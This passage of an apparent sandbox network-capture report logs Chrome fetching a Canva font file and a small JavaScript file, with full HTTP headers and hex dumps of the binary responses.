                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 86 bc e7 4f 4e a9 33 56 f6 9f c1 97 35 6a d2 ac d3 13 5d 9e 79 e1 bd 3e 23 8d f6 b3 5f 00 dd eb 99 06 e3 39 ee 8c b7 3e 79 a7 57 b7 87 a3 eb 23 3c d4 6c 22 b5 1e 8f b9 5d 46 93 29 6b f4 43 e8 81 b2 b1 30 03 1f b5 38 a8 c8 21 e7 a2 23 50 d8 68 58 38 44 e4 54 69 d0 64 c3 9c 25 2b 32 b3 2c 34 d7 7c de 16 f4 a5 25 d6 5b 6d ad 75 b6 f0 f3 4e 82 7d e2 a4 88 97 2c 55 b6 a3 8a 1d 72 58 b5 0a 0a 95 f2 b5 bb e7 96 3b 1e b9 db 97 1e fa a2 df a0 cf fe ef a9 c9 18 12 91 f6 63 4a 22 90 49 2c 87 44 2e a1 2c 4a 0a 28 2b a4 ed 18 35 07 68 39 42 c7 71 ea 0e d2 77 d2 34 27 18 3a cd c0 29 26 ce 31 76 96 bd 0b 6c d5 b2 70 9e 9d 3a d6 ca 99 a9 e1 a8 9e b3 06 57 b8 ba ca dd 75 6e ae f1 70 83 a7 9b a6 6b 31 53 9b 19 5a d5 3b 84 69 82 65 b4 39 bc 25 b2 35 86 6d 96 5d a6 1d 8e 7d
                                                                                                                                                                                                                                                    Data Ascii: ON3V5j]y>#_9>yW#<l"]F)kC08!#PhX8DTid%+2,4|%[muN},UrX;cJ"I,D.,J(+5h9Bqw4':)&1vlp:Wunpk1SZ;ie9%5m]}
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 51 5a f3 3f f4 05 f9 1f 8e 07 35 02 1b 82 1a 89 4f 40 8d c2 e6 a0 46 e3 2b 50 73 ea 6e 50 4f b4 12 31 55 3e 69 9a 7c da d4 f9 96 69 f3 6d 93 e5 3b a6 cb 77 cd 94 ef 99 3e df 8f dc 7c d6 1c 0f a7 0d 22 3b 8c 3b 90 24 7b b2 6c 5d 51 ac e9 e9 d9 57 ab 6d e9 eb db b5 6a d5 91 91 b1 e3 fd b3 41 cb 11 f8 5f 07 ad 44 e0 ff 1a b4 1a 81 ff 6f d0 5a 84 fa ff 87 be 8e 41 99 32 3f 94 2b 17 a5 42 85 31 95 2a fd ab 4a 95 09 e6 77 81 0b 6c e4 17 bf d8 6f 7f 55 3a 3d 61 f0 6f c8 43 fd 95 11 46 7a d4 28 a3 3c 68 8c b1 1e 36 ce 38 0f 99 60 82 77 4d 34 d1 fb 26 31 89 eb 4d 61 0a 57 ee 4c b9 6a 61 ee 98 a7 f3 a4 c5 2c e6 2c 3b d9 c9 09 76 b3 b7 53 1c e4 68 fb b8 ce 75 3e df 7b 8c 7c 11 4c 1c 7c 79 0f c3 0d f7 86 09 26 f8 d0 24 26 f1 a6 29 4c e1 3f 33 98 c1 07 56 b5 9a 73 ac
                                                                                                                                                                                                                                                    Data Ascii: QZ?5O@F+PsnPO1U>i|im;w>|";;${l]QWmjA_DoZA2?+B1*JwloU:=aoCFz(<h68`wM4&1MaWLja,,;vShu>{|L|y&$&)L?3Vs
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 47 fb c8 8c ec 3d 43 25 b3 04 ed 3e 33 b8 92 fe 19 98 1d 8e f0 c7 e6 b1 77 b4 b9 d6 4b 68 f7 e6 6b be 73 00 02 47 7e 4c 62 5f 68 90 74 2e 4b 38 67 89 c5 49 1a 1b 50 27 0f da 08 53 a8 d2 ea 62 ee 16 0b a9 06 fa db 47 96 d1 f4 de 9f 62 9d 25 66 1d ce b3 5d 75 8f b7 79 96 48 5a e8 b4 f4 83 aa ca 87 ac 1e 1e f3 b4 e7 a6 39 30 43 23 cc 32 36 2a 1a 24 a3 41 3d 3c de 79 86 cf 44 01 71 44 96 7e 9c 37 26 cb b2 ff bc 65 b3 cc 61 bf 01 8e 2e 10 92 d4 43 43 a4 b3 1e 9d 77 8a 59 e2 5c 00 e2 22 b3 b2 c7 d3 92 7c e2 3a 76 46 f5 20 90 e8 ce 66 a4 a5 9e 7f 5e 11 db 64 fd e2 7d 80 0c a1 05 3b 13 3e 95 44 ab 65 f5 76 ba 87 be 42 2d d6 c4 a6 3a 44 32 b1 67 32 e7 d1 94 95 57 30 5a 03 fa f6 74 d6 52 ba 75 f7 ce f4 8c d6 3c 5b e8 e1 4d 8e a7 bc b1 e6 4d 53 08 05 6a 50 75 37 cc
                                                                                                                                                                                                                                                    Data Ascii: G=C%>3wKhksG~Lb_ht.K8gIP'SbGb%f]uyHZ90C#26*$A=<yDqD~7&ea.CCwY\"|:vF f^d};>DevB-:D2g2W0ZtRu<[MMSjPu7


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    45192.168.2.449790104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC636OUTGET /YAFdJjTk5UU/0/CanvaSans-Medium.95291d1cd5c6185e00ba590.c69c23593c9bd5705c7780a200f2a6db.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1280INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 41508
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a277ccf0ca6-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1694302
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "8a83d3ea2e60560ba77baec1cce6881a"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:31 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 14 Mar 2023 06:04:13 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: 6jCHTKKGheN7pgEg4DOJftB+gJX2xiTSOBd1egj9fDr25ZH4uDu3C635TT1uvIVFo0w6wS11ZnRNG+WkgeRmlxJDFeyqxuXN7M/8GRpS+s4=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: ENDN2VSX18Y6HY4B
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: jzlORx4dSA3VNrfPxcv4MAi8WZwRHI5P
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC789INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 39 30 7a 31 46 67 47 32 66 4f 55 72 54 48 48 50 55 4a 61 49 63 65 36 41 48 6e 6b 31 66 67 43 79 72 74 41 65 66 4f 6b 6d 65 77 34 2d 31 37 33 34 36 34 33 36 35 31 2d 31 2e 30 2e 31 2e 31 2d 5f 35 4d 77 57 31 6a 37 74 6a 77 36 55 59 69 30 55 39 30 65 4e 74 74 7a 6b 4f 4f 79 36 62 53 58 49 7a 38 6e 47 4e 77 62 44 73 6d 37 51 44 72 66 71 43 50 76 75 4f 71 5a 42 41 58 37 59 74 58 35 4b 45 67 44 4d 59 31 50 4e 33 57 6b 74 59 38 48 6a 52 39 37 42 41 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=90z1FgG2fOUrTHHPUJaIce6AHnk1fgCyrtAefOkmew4-1734643651-1.0.1.1-_5MwW1j7tjw6UYi0U90eNttzkOOy6bSXIz8nGNwbDsm7QDrfqCPvuOqZBAX7YtX5KEgDMY1PN3WktY8HjR97BA; path=/; expires=Thu, 19-Dec-24 21:57:31 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC669INData Raw: 77 4f 46 32 00 01 00 00 00 00 a2 24 00 11 00 00 00 01 dc b4 00 00 a1 be 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 44 1b ea 6e 1c a0 0c 06 60 00 af 6e 08 81 02 09 9c 15 11 08 0a 85 8a 74 84 c3 1a 0b 89 3e 00 01 36 02 24 03 92 3a 04 20 05 91 2f 07 a1 7b 0c 81 4b 5b ed b2 91 00 d6 6e fb 7b 28 09 dd 86 00 af 5e 2e 9b 4d 7f e3 1b b8 cd 29 be 3a 91 9e 9b bb d4 46 ac 46 ae 11 4f 3b b8 dc 6d 83 87 59 b7 25 9b 82 ec ff ff ff ff 25 c9 22 c6 b5 33 6a e7 f6 ba 52 a5 3c 50 ef e1 a1 bb 29 29 c2 32 e6 c6 0a 91 a0 45 89 ba 53 77 ea bc b0 dc c9 54 1c 95 f6 11 d6 f7 6e 91 a2 6f 32 44 b8 09 1d 3d 15 0b 0b 08 73 1c 4c 1a 43 c5 b2 29 39 73 74 9c c4 5c f4 90 44 c3 59 60 0a 9c 17 72 b4 9f d2 c1 09 96 0a 55 d9 c2 cf d6 90 8b 4a 5c a1 cb d9 1a
                                                                                                                                                                                                                                                    Data Ascii: wOF2$Dn`nt>6$: /{K[n{(^.M):FFO;mY%%"3jR<P))2ESwTno2D=sLC)9st\DY`rUJ\
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 85 0b 72 1f 96 34 6e ff ef 5b fa 97 5a 90 40 a5 a1 20 90 2c 27 19 07 6f c9 96 0b f4 ff 8e 7e ce 9b fb 12 b6 4d a1 b0 bb 90 38 bc 44 2a 14 07 29 69 eb 9a fc 9f dc ec 7b 6f 90 0d 78 8c 10 1f 24 66 2c 10 25 99 ac db 37 2d ea bb f2 7a d1 aa fa d6 df 11 ff fd de ff d6 6b ef 13 ee 9b 10 d1 63 3c 8a 51 84 24 34 18 8d c2 81 90 e8 94 84 0b 59 28 70 38 ca 23 f3 fb f7 ff e6 34 97 12 bb aa 3d 3f a7 0b 8c f9 e6 c0 5d 9b 81 17 05 da 76 03 a0 e8 21 82 de 42 22 74 ff 07 db b4 c2 e6 df 33 eb 6e 66 b0 79 2a 10 f0 04 f1 ba cc fd dc 3f cf 1b 59 d7 2e e4 40 f0 85 df 72 f6 ce 3c e0 b1 37 db 33 11 c7 9f 60 4b 14 a5 e5 e8 6e 19 1e de 35 f1 07 e8 08 db a6 bd 01 81 22 56 1c 27 06 4a cf d8 ed f9 d9 b1 13 68 b1 77 f6 3f 5b 58 60 ca 4e 52 52 25 35 e1 ee 9e e9 97 18 3c cf e7 f9 9d 9b
                                                                                                                                                                                                                                                    Data Ascii: r4n[Z@ ,'o~M8D*)i{ox$f,%7-zkc<Q$4Y(p8#4=?]v!B"t3nfy*?Y.@r<73`Kn5"V'Jhw?[X`NRR%5<
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: a3 0e 84 8b 06 4c 58 f0 d1 a6 43 17 be 1d ff fe cd 7b 05 39 20 46 ac b8 09 7a 40 8a c2 aa 66 a9 b5 80 32 f2 98 8d 17 3c f8 09 13 f7 5f 90 b1 05 0a 90 65 8c a0 c0 df 48 28 15 ee 14 e1 44 06 36 42 48 22 93 9c 17 b6 64 3a 19 51 69 49 3c cc 64 68 5f 4e d8 9d ef 1e e3 59 01 e5 7d 12 f4 01 a6 58 19 f7 9b 11 ff 0c 92 f0 75 be 14 13 01 84 11 4d 02 69 64 23 b2 82 f9 dd e7 38 d7 78 7e 1b 28 19 71 22 12 72 7e 44 c4 75 4a 42 25 7c 02 74 48 2a ea 86 00 6e 26 eb 9d 87 0a 1c 01 36 ae c3 55 3f 38 d2 1f 21 a6 26 0b 8e 24 28 8c 6d b9 70 20 a7 9b f1 e2 e9 05 30 e3 9f 7c 08 48 b7 2f 8b 1d 4f 17 b1 f3 9e 24 39 0f 5c 5e fd a3 77 2a 20 ef e3 11 28 14 fd 47 37 ed 92 55 61 da bc 90 05 d3 1c 37 e5 9d 9f d8 fb d2 3e e9 f8 8d 32 8d 31 cb c1 3f 38 a4 b1 bf 60 cc f8 ad 64 06 ef 60 1f
                                                                                                                                                                                                                                                    Data Ascii: LXC{9 Fz@f2<_eH(D6BH"d:QiI<dh_NY}XuMid#8x~(q"r~DuJB%|tH*n&6U?8!&$(mp 0|H/O$9\^w* (G7Ua7>21?8`d`
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 5f 38 50 9e fc 4d 22 aa 3e 1f fa 95 1a 7e fc df 22 c9 02 06 4f 41 ad ac 66 54 c5 61 65 dc 5c 72 f0 c8 5e 71 05 13 59 48 60 00 d0 97 3f 2d d3 2a f7 8f 04 54 52 da 55 ab 2f 5a 20 77 68 38 c3 f9 2f ad 19 dd 12 3b ef b1 88 02 dd 02 f4 74 9c 88 ed 45 c4 64 81 7a 20 17 a2 01 37 dc cd a3 23 1a 9b 3c e8 05 06 d8 78 00 53 6b 33 1f 57 01 d7 a0 3d a8 54 1f d6 29 e2 43 1f 19 62 3c 02 8e 50 f6 77 76 0b 3b 1e e3 f6 06 9f b1 f2 19 e6 4a b6 1a c6 e7 86 05 16 f2 6e 6a fc 20 1f 79 2f 89 d2 69 78 01 ae 42 c3 59 9d 09 ed 26 ed d7 0f 09 0f f6 1d 87 40 5d 8f 4a 54 7b 51 43 27 6f 81 fc 66 62 48 8c 01 8d a7 f7 a8 64 68 a7 7e 9a aa bb ec 70 64 fe 4b 13 1b a9 0a 92 7e 5e 2e 15 5e a4 0c a0 34 54 bb 85 cd 66 7d bb cf 36 9c 9e 70 b3 2c 04 c8 88 d3 8b db c8 0f 06 e1 03 51 67 90 e6 18
                                                                                                                                                                                                                                                    Data Ascii: _8PM">~"OAfTae\r^qYH`?-*TRU/Z wh8/;tEdz 7#<xSk3W=T)Cb<Pwv;Jnj y/ixBY&@]JT{QC'ofbHdh~pdK~^.^4Tf}6p,Qg
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: ad 99 ac d6 35 d3 86 da 4b 60 ec b5 93 80 36 f9 56 8c 8a 6e 11 42 20 a9 34 a2 74 3e 75 2b 1e 8a 50 e4 bb 8e 80 c8 94 8e 84 42 55 8b e6 95 1e 66 4d 1a de 35 9d d4 29 e2 a2 e9 f8 6a d5 83 69 dd d0 ec 6b 8b 51 e7 95 0e b4 f9 d3 32 a4 44 04 1b 93 6a 2c 12 c6 3e 0f bb c9 85 12 ad 09 64 d5 ed 2c f5 7b 19 4d 43 52 49 05 46 61 d4 e9 a8 1f 33 21 ba 39 b6 2f 1d a0 b6 e1 a9 f1 a6 a0 dc 52 e4 9e 26 88 99 22 56 2e cc 66 a1 c6 41 2f e1 47 a9 ec e2 e9 6c 2e 53 86 0d 09 67 22 cd 86 44 04 a0 ba a1 49 da 12 9c b5 97 86 4a ba 8c 49 09 aa d0 c3 5d 41 a8 1a 94 c1 64 38 ec 65 af ed 47 08 8e 67 53 21 e0 b4 f8 94 89 52 5a 3d 57 13 53 bf 95 47 f1 d9 c4 a2 9c cf 77 3b c6 d2 0d 3d 84 40 48 89 60 57 f7 a4 81 ee 66 23 53 11 25 d5 15 48 f1 63 d7 d4 12 5c 87 13 6e e4 2f 65 6e e4 d7 cc
                                                                                                                                                                                                                                                    Data Ascii: 5K`6VnB 4t>u+PBUfM5)jikQ2Dj,>d,{MCRIFa3!9/R&"V.fA/Gl.Sg"DIJI]Ad8eGgS!RZ=WSGw;=@H`Wf#S%Hc\n/en
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 85 95 92 da 98 5a 05 5a a1 a4 c9 55 25 bd 74 e6 56 77 9a d6 4e 35 c6 a0 18 96 61 ed ec b7 b3 9f b3 17 45 db c3 06 5c c3 6f 58 5c 64 a0 c5 2f 14 dd d3 c9 a9 0c 82 7b d7 14 80 39 61 71 4b b5 44 71 4f 42 72 ca 0b 42 28 55 1a 8d 5a a3 a1 ed 18 2b 92 e5 28 ad 6e 3c 19 94 b7 8e 87 2c 6a 47 e8 1c a1 70 84 b6 44 f6 f4 bc 25 1b c8 6c d8 b6 6c 7f 18 3a df 62 b0 18 ed 15 77 57 cd 25 30 e9 37 6b c2 fb e7 88 ff a4 f5 7e 4e ee 8f 67 17 93 d2 19 07 09 28 5a c5 a4 6e 3b 96 51 1c 17 2a 60 22 7d ab b2 37 0c e4 fc 25 d0 a6 d0 aa 5d 2d fe bf 14 11 09 32 b5 26 a0 a0 63 d6 28 64 b6 32 eb 4a b0 dc d5 25 de e9 db f1 4f 4f eb 9c e1 a8 24 b3 cb 8f 94 a8 81 36 84 94 f4 2c 5c 9a cd b1 d4 fa 1d 43 14 67 bd 30 0e 49 b2 e4 69 4b a4 94 41 1d b7 16 73 2d b3 21 44 29 dc 7a 61 a2 24 6b a8
                                                                                                                                                                                                                                                    Data Ascii: ZZU%tVwN5aE\oX\d/{9aqKDqOBrB(UZ+(n<,jGpD%ll:bwW%07k~Ng(Zn;Q*`"}7%]-2&c(d2J%OO$6,\Cg0IiKAs-!D)za$k
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 24 27 25 c8 a4 26 2d e9 95 2f 44 5a b2 54 4c 82 04 cb 2c 8b 6c b2 cb 21 a7 5c 72 cb a1 2b ce 94 1e cc 2d 8c d7 5c 31 38 12 42 a4 92 95 6c ae f2 40 44 6e e3 42 e7 f2 8c 95 b8 46 33 e2 eb 0e 32 30 1a f4 1c 58 f9 79 0d 75 5d a6 42 df 3a 77 93 a6 19 a2 8b 06 b4 fa af ca 2f d7 56 cf f3 a6 40 73 8e ba ff 8b 67 83 4d 3d d2 eb 29 10 00 bd 60 5e 02 0e 34 40 07 d0 63 53 c8 28 72 21 4b b5 86 b5 4a 37 5a 66 96 99 cc 84 fd 9a 9c 28 0e cb d2 ff 65 c5 e5 af e2 50 d1 c9 9a ae 8d 26 d5 2c 9a 4d f3 8d 48 50 5d d7 7d 3d f4 24 81 bb 84 fb 36 e5 19 5a a2 35 ea d2 26 1d d3 05 3d a0 36 ea a1 9d bc 0d bc bd 7c 4c 4e c1 a1 8e eb 34 9d a1 f3 e0 a8 9d bd fc c4 fc 93 ff 8a ff d6 cd bb 25 b7 e6 f6 dc 13 57 e3 1a fd 7a ff 5d c1 2f 82 77 19 e7 fd b7 fb b3 f7 17 85 18 5b cd d6 2f 41 45
                                                                                                                                                                                                                                                    Data Ascii: $'%&-/DZTL,l!\r+-\18Bl@DnBF320Xyu]B:w/V@sgM=)`^4@cS(r!KJ7Zf(eP&,MHP]}=$6Z5&=6|LN4%Wz]/w[/AE
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 8b 7c e3 51 6f 22 e0 26 63 dc 54 bc 9b 8e bd 99 66 e3 da 5c b2 9b 4f a2 85 16 93 1a 3e e6 2d a5 b7 e5 4c b7 92 e1 de 67 bc 0f 3d da c7 4c ae 4f 12 9d 03 00 f0 19 94 d9 56 f3 dc 5a 2f 5b 8f 90 fb 36 0a dd 66 16 db 6a 6f db 25 6d 27 c4 76 4b d8 5e a9 db 2f 71 07 21 77 58 da 8e ca d9 71 65 3b a9 b0 2f 9d 56 bc b3 da 77 5e 53 17 5d d6 b2 ab d0 bb 6e 7a 37 e1 77 db dc ee 5a d8 d7 de ef 5b 8b d7 f7 3f 44 29 ce 0f 5a d9 cf b7 75 7e d1 97 7e 9f 3f 79 9e bf bc fd f3 8f 3e fd f8 ff c1 37 11 32 06 b0 80 08 cc 84 28 d0 41 34 98 0a d1 c1 0d c4 80 59 10 13 78 43 cc b0 10 62 01 3f 88 1b 2c 81 58 c1 0e 71 87 32 88 0d 7c 20 1e b0 08 e2 09 81 10 2f 58 0e f1 86 20 88 0f ac 80 f8 42 14 c4 0f 36 42 ec 10 0a f1 87 d5 90 00 88 84 04 c2 7a 48 10 44 43 82 61 13 24 04 c2 20 a1 b0
                                                                                                                                                                                                                                                    Data Ascii: |Qo"&cTf\O>-Lg=LOVZ/[6fjo%m'vK^/q!wXqe;/Vw^S]nz7wZ[?D)Zu~~?y>72(A4YxCb?,Xq2| /X B6BzHDCa$
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: d1 67 3b c3 40 57 40 57 75 77 db a1 da 1d 7c 69 a6 10 06 5e 46 49 d9 2d f6 8b 86 8d 47 5a f0 f9 40 62 eb d2 44 85 d5 eb 14 63 57 d2 6b 6e 4c d8 ed 38 59 81 1d 40 e2 b0 07 b2 88 51 2a 55 4a 81 09 60 d7 49 20 c3 19 f0 3d 8a 9d 81 89 4b a0 4c 53 75 4e 2f 78 f9 68 38 60 9c 15 bd da 8c b5 de 98 8c 5e 9a 95 fd 26 0c fc 4a 83 14 eb 4a a4 ab 11 62 18 1c eb 00 ef f1 b6 2b 7b 95 ba 81 0e 43 79 61 90 93 1c 2d 6c b0 a2 e0 3c ab d7 f3 1f 8b 76 dd 10 fc 1f 30 d8 6e 22 1d 3a 33 db b1 36 2d dc 4e 2b de b1 d7 81 a7 2c 03 46 5a 3b f8 5c d3 59 c0 84 09 10 c4 0d be bd b6 ff 45 8a e3 0a d3 c3 77 d8 24 10 4a e3 4d 07 64 36 ba e0 e5 53 f6 2a d2 8c 94 df eb 40 3a 89 78 d6 0c de 7d 11 e3 3f 6a 7d 08 ad e1 79 80 b2 dd 07 f2 ee f3 5e c8 79 23 67 eb e7 60 90 e1 d7 40 66 1f 04 ac 01
                                                                                                                                                                                                                                                    Data Ascii: g;@W@Wuw|i^FI-GZ@bDcWknL8Y@Q*UJ`I =KLSuN/xh8`^&JJb+{Cya-l<v0n":36-N+,FZ;\YEw$JMd6S*@:x}?j}y^y#g`@f


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    46192.168.2.449792104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC615OUTGET /web/43ddbdb7757e7317.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1221INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a277c3c72b7-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 761162
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "cda459f2f4321c68cea3296f0945c472"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:17 GMT
                                                                                                                                                                                                                                                    Last-Modified: Wed, 11 Dec 2024 01:49:54 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 12 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: WVjx+Cd1gfSAWwE1ghE/dZeDURNsll1jSn7UbTqfO7fpls1JuD7ZFY5xCvMsZiLbu9OOD9uAh8FzG7W85AZioxaKv4ynUKg/ZRhIegYPY1I=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: TT4QSEPDJZEKTY8W
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: Ck0IotSh_5YQTu5YWsI8kTwKxqKgARF5
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 47 30 53 78 37 4f 77 72 25 32 42 76 4b 53 69 61 4d 75 31 4c 76 54 53 68 70 56 33 4c 53 70 43 54 72 48 64 67 36 42 6c 4f 6f 68 6c 71 47 54 32 43 31 51 4f 64 5a 36 6b 32 74 4f 51 45 4e 46 61 70 44 6e 77 58 43 25 32 42 4f 64 37 6e 73 35 6c 68 58 6b 4e 5a 58 61 33 6a 70 4f 41 4a 48 49 41 57 36 71 6d 25 32 42 25 32 42 61 42 53 6c 51 33 37 6d 6f 68 52 4e 57 4f 69 72 25 32 42 7a 65 45 54 43 6b 69 36 48 45 35 4a 5a 50 70 32 45 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0Sx7Owr%2BvKSiaMu1LvTShpV3LSpCTrHdg6BlOohlqGT2C1QOdZ6k2tOQENFapDnwXC%2BOd7ns5lhXkNZXa3jpOAJHIAW6qm%2B%2BaBSlQ37mohRNWOir%2BzeETCki6HE5JZPp2E%3D"}],"group":"cf-nel","max_age":60
